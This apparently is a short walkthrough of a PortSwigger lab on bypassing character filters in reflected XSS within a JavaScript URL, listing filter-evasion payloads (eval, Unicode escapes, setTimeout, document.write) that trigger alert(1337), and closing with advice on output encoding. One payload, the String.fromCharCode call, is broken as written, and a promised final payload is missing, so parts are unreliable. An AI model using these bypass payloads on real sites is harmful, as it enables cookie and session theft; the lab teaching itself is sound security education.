Bypassing Character Restrictions in Reflected XSS-PortSwigger Lab Walkthrough

Introduction

This lab demonstrates how some applications attempt to block certain characters to prevent XSS but fail due tp bypass techniques.

Lab Overview

This lab reflects user input in a JavaScript URL context. However, some characters are blocked to mitigate XSS attacks. Our goal is to execute an alert(1337) by bypassing these restrictions.

Identifying the Vulnerability

1. The application reflects user input in a JavaScript URL.

2. Some special characters are blocked.

3. We need to find a bypass to execute JavaScript successfully.

Testing Basic XSS Payloads

We first test a basic JavaScript payload:

javascript:alert(1337)

If the alert() function or some characters are blocked, we try:

javascript:eval(‘alert(1337)’)

Or Unicode encoding to bypass filters:

javascript:\u0061\u006c\u0065\u0072\u0074(1337)

Finding a Working Bypass

If parentheses or alert are blocked, we use alternative execution methods:

1. Using String.fromCharCode

   javascript:String.fromCharCode(97, 108, 101, 114, 116)(1337)

2. Using setTimeout

   javascript:setTimeout(‘alert(1337)’)

3. Using document.write

   javascript:document.write(‘<script>alert(1337)<\/script>’)

Executing the Attack

1. Identify which characters are blocked.

2. Modify the payload to bypass filters.

3. Inject the payload into the vulnerable parameter.

4. Execute the XSS attack successfully.

Copy the lab Id and paste in the given payload below:

Understanding the Impact

This vulnerability allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:

1. Cookie theft using document.cookie

2. Session hijacking

3. Phishing attacks

4. Keylogging or defacement attacks

Conclusion

Even though developers try to block certain characters to prevent XSS, attackers can still find creative ways to bypass these restrictions. This lab teaches us the importance of proper output encoding and context-aware sanitization in preventing XSS.